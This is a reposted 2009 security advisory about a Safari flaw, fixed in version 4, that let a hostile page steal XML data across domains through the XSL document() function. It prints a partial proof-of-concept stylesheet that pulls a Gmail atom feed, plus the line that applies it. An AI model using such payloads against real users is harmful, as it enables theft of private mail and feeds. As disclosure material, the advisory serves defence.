Home » 2009 » June » 11 » Apple Safari cross-domain XML theft vulnerability
7:54 AM
Apple Safari cross-domain XML theft vulnerability
Safari prior to version 4 may permit an evil web page to steal
arbitrary XML data cross-domain.

This is accomplished by abusing a relatively obscure cross-domain
access point which was completely missing a cross-domain access check.
The access point in question is the document() function in XSL. This
is best illustrated with a sample evil XSL file which abuses this

<xsl:stylesheet version="1.0"
xmlns:str="http://exslt.org/strings" extension-element-prefixes="
<xsl:template match="*">
Below, you should see e-mail stolen cross-domain!
<xsl:value-of select="document('https://mail.google.com/mail/feed/atom')"/>

To mount the attack, the attacker would serve a web page which has XML
MIME type and requests to be styled by the evil stylesheet:

<?xml-stylesheet type="text/xsl" href="safaristealmailbug.xsl"?>

There are a number of interesting XML-based formats you might want to
steal including authenticated RSS, XML-formatted AJAX-y responses, and

Full technical details: http://scary.beasts.org/security/CESA-2009-008.html

Blog post: http://scarybeastsecurity.blogspot.com/2009/06/apples-safari-4-also-fixes-cross-domain.html
(includes 1-click demo)

Views: 1310 | Added by: Siegh_Wahrhreit | Rating: 0.0/0
Total comments: 0
Name *:
Email *:
Code *: